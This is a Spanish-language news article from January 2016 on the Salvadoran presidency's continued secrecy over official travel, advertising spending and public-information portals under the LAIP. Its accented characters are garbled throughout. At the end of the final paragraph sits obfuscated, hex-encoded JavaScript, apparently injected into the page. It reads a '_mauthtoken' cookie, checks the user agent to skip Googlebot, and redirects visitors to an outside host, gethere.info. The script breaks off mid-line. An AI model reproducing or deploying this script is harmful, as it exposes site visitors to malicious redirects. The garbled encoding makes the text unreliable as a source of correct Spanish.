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22 Ene 2016
Noticias | Por: Redacción

Los secretos de Funes que SA?nchez CerAi??n sigue resguardando

Aunque el actual presidente salvadoreAi??o dio un giro drA?stico en su mandato comparado con el expresidente Funes, hay cosas que SA?nchez CerAi??n aA?n sigue replicando, como mantener reservado sus viajes oficiales, gastos de publicidad y restricciones a los mecanismos de participaciA?n ciudadana.

El estilo de vida, el costo que pagaron los salvadoreAi??os y la presencia mediA?tica que tenAi??a el expresidente Mauricio Funes, son algunas diferencias que se ven muy marcadas entre Ai??l y el actual presidente, Salvador SA?nchez CerAi??n. La vida lujosa y cara que llevaba el expresidente Funes ha quedado en la historia y fue una de las crAi??ticas mA?s recurrentes que recibiA? durante su gestiA?n, sin embargo, la reserva de informaciA?n en los viajes del presidente, asAi?? como los gastos en publicidad que tienen el gobierno y el acceso a la informaciA?n pA?blica, son cuestiones que siguen practicA?ndose en el mandato de SA?nchez CerAi??n.

Reserva de viajes oficiales

La Ley de Acceso a la InformaciA?n PA?blica (LAIP) establece como informaciA?n oficiosa toda aquella ai???que los entes obligados deberA?n difundir al pA?blico en virtud de la ley sin necesidad de solicitud directaai???. Es decir, las instituciones pA?blicas estA?n obligadas a dar a conocer esta informaciA?n sin que los ciudadanos la pidan a travAi??s de solicitudes de acceso a ella. De acuerdo con el numeral 11 del artAi??culo 10 de la LAIP, ai???los listados de viajes internacionales autorizados por los entes obligados que sean financiados con fondos pA?blicos, incluyendo nombre del funcionario o empleado, destino, objetivo, valor del pasaje, viA?ticos asignados y cualquier otro gastoai???, son considerados como informaciA?n oficiosa.

Sin embargo, durante el perAi??odo presidencial de Mauricio Funes pidiA? que se declarara esta informaciA?n como reservada, porque ponAi??a en riesgo su seguridad y la de su familia, pese a que los viajes ya se habAi??an realizado. Aun asAi??, el Centro de AsesorAi??a Legal AnticorrupciA?n (ALAC), de la FundaciA?n Nacional para el Desarrollo (Funde), interpuso una apelaciA?n al Instituto de Acceso la InformaciA?n PA?blica (IAIP) para que esta informaciA?n fuera desclasificada, pero la solicitud no procediA? y el Instituto siguiA? aduciendo como reservados los viajes.

No obstante, el pasado 19 de enero la Sala de lo Constitucional de la Corte Suprema de Justicia (CSJ) ordenA? a la Presidencia de la RepA?blica remitir informaciA?n acerca de los viajes del expresidente Funes, asAi?? como la logAi??stica de seguridad y transporte empleados durante las misiones oficiales del exmandatario. En su resoluciA?n, la Sala ha dispuesto de 10 dAi??as hA?biles para que los encargados briden el informe de lo solicitado y de incumplirse la medida, advirtiA? que podrAi??a tomarse como un hecho delictivo que requerirA? de la intervenciA?n de la FiscalAi??a General de la RepA?blica (FGR).

Empero, los viajes de los otros expresidentes, asAi?? como los del actual mandatario, siguen siendo un misterio, pues la Sala se refiriA? en especAi??fico a los viajes del expresidente Funes.

Sin conocer gastos de publicidad

El tema de cuA?nto ha invertido el gobierno en publicidad tambiAi??n es algo que se maneja con recelo desde el Ejecutivo, pues ninguno de los gobiernos anteriores se ha atrevido a ventilar esta informaciA?n. Y el presidente SA?nchez CerAi??n continA?a con ese secretismo. Aunque este punto ha tenido menos frutos que el de los viajes, el actual mandatario tambiAi??n se rehA?sa a decir cuA?nta gasta en sus campaAi??as del ai???Buen vivirai??? o de ai???Abrazar la esperanzaai???.

Pese a que Mauricio Funes prometiA? un gobierno de puertas abiertas, y que dijo brindarAi??a toda la informaciA?n para que los periodistas hicieran bien su labor, toda informaciA?n relacionada con viajes, publicidad e inversiA?n cuantiosa, Funes se negA? a darla a conocer. En la actualidad, su predecesor sigue con esa prA?ctica.

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RestricciA?n a informaciA?n pA?blica

El artAi??culo 18 de la Ley establece las formas de divulgaciA?n de la informaciA?n pA?blica y en este rige que la informaciA?n oficiosa deberA? estar a disposiciA?n del pA?blico ai???a travAi??s de cualquier medio tales como pA?ginas electrA?nicas, folletos, periA?dicos u otras publicaciones o secciones especiales de sus bibliotecas o archivos institucionalesai???. Asimismo, este artAi??culo afirma que serA? el IAIP el encargado de fomentar que los entes obligados ai???utilicen las tecnologAi??as de informaciA?n y que dentro de un plazo razonable estAi?? a disposiciA?n del pA?blico. No obstante, ninguna instituciA?n podrA? negar informaciA?n so pretexto de no contar con la tecnologAi??a adecuadaai???, asegura este artAi??culo.

No obstante, la mayorAi??a de instituciones pA?blicas, con el cambio de gobierno y de imagen institucional, ocultaron su secciA?n a la que se refiere la normativa. Normalmente identificado como ai???Portal de Transparenciaai???, ai???Oficina de InformaciA?n y Respuestaai???, entre otros, el micrositio destinado a esta informaciA?n se eliminA? de los sitios web de dependencias como Presidencia de la RepA?blica, Ministerio de EducaciA?n, Ministerio de EconomAi??a o Relaciones Exteriores, por mencionar algunos, con lo cual han imposibilitado que los ciudadanos puedan consultar informaciA?n oficiosa que administran dichas entidades.

Burocracia en brindar informaciA?n

AdemA?s de la restricciA?n en la informaciA?n pA?blica, el proceso para hacer las solicitudes, asAi?? como la documentaciA?n y mecanismos de participaciA?n ciudadana se han vuelto mA?s burocrA?ticos con el cambio de gobierno en el 2014. Por ejemplo, a falta de un micro sitio destinado a la transparencia, los ciudadanos deben rebuscarse para obtener las solicitudes de informaciA?n, imprimirlas, luego llenarlas, escanearlas y enviarlas a la instituciA?n que desean solicitar la informaciA?n.

Asimismo, la solicitud no se puede realizar si no cuenta con el DUI escaneado o correo electrA?nico, pues son requisitos mAi??nimos que requieren las unidades de acceso a la informaciA?n para poder aceptar la solicitud. Por tanto, quien no pueda usar las tecnologAi??as de la informaciA?n y que tampoco disponga de escA?ner para la documentaciA?n necesario, no puede solicitar informes, a menos que acuda a la instituciA?n y haga la solicitud en fAi??sico.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== 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